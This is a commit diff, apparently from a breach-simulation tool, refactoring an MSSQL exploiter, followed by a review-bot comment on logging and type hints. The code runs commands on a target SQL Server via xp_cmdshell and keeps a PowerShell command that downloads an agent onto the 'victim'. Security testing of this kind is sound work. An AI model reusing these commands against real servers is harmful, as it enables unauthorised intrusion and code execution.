Agent: Refactor MSSQL run agent commands

Remove the dependency on the MSSQLLimitedSizePayload and use simple
methods like "_write_command_to_batch_file()".
This commit is contained in:
Mike Salvatore 2022-06-14 12:51:43 -04:00
parent b2aa8333c3
commit f349e1a334
1 changed files with 7 additions and 15 deletions


@ -36,7 +36,6 @@ class MSSQLExploiter(HostExploiter):
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
XP_CMDSHELL_COMMAND_END = "'" XP_CMDSHELL_COMMAND_END = "'"
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
MONKEY_DOWNLOAD_COMMAND = ( MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)." "powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@ -117,14 +116,13 @@ class MSSQLExploiter(HostExploiter):
self.run_mssql_commands(array_of_commands) self.run_mssql_commands(array_of_commands)
def run_monkey(self, monkey_path_on_victim: PureWindowsPath): def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) self._write_agent_launch_command_to_batch_file(monkey_path_on_victim)
logger.debug(
f"Launching the agent: {monkey_launch_command.prefix} -- "
f"{monkey_launch_command.command} -- {monkey_launch_command.suffix}"
)
self.run_mssql_command(monkey_launch_command)
self.run_payload_file() self.run_payload_file()
def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim):
agent_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
self._write_command_to_batch_file(agent_launch_command)
def run_mssql_commands(self, cmds): def run_mssql_commands(self, cmds):
for cmd in cmds: for cmd in cmds:
logger.debug(f"Running command on SQL Server: {cmd}") logger.debug(f"Running command on SQL Server: {cmd}")
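Review bot: The rewritten `run_monkey` no longer logs the launch command before it is executed — the old `logger.debug(f"Launching the agent: …")` block was dropped together with the `MSSQLLimitedSizePayload` split, and nothing equivalent was added to `_write_agent_launch_command_to_batch_file`, so a failed launch is harder to trace from the agent log than before. Restoring it is one line before the write, `logger.debug(f"Writing agent launch command to batch file: {agent_launch_command}")`. The new helper also leaves `monkey_path_on_victim` unannotated while `run_monkey` and `get_monkey_launch_command` type it as `PureWindowsPath`; `def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath) -> None:` keeps the three signatures consistent. Whether `_write_command_to_batch_file` reproduces the prefix/suffix handling that `get_monkey_launch_command` sheds in the last hunk cannot be confirmed here, since that helper is defined outside this diff.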
@ -170,17 +168,11 @@ class MSSQLExploiter(HostExploiter):
sleep(MSSQLExploiter.QUERY_BUFFER) sleep(MSSQLExploiter.QUERY_BUFFER)
def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
# Form monkey's launch command
monkey_args = build_monkey_commandline( monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, monkey_path_on_victim
) )
suffix = ">{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}"
return MSSQLLimitedSizePayload(
command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
prefix=prefix,
suffix=suffix,
)
def brute_force(self, host, port, users_passwords_pairs_list): def brute_force(self, host, port, users_passwords_pairs_list):
""" """